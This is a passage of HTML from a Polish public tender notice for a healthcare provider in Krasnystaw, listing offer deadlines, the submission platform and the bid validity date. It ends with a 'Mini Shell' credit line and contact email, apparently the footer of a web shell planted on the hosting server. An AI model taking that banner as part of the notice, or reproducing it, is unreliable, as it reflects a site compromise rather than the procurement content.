Pzp, oraz na warunkach określonych we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://spzozkrasnystaw.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-12 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com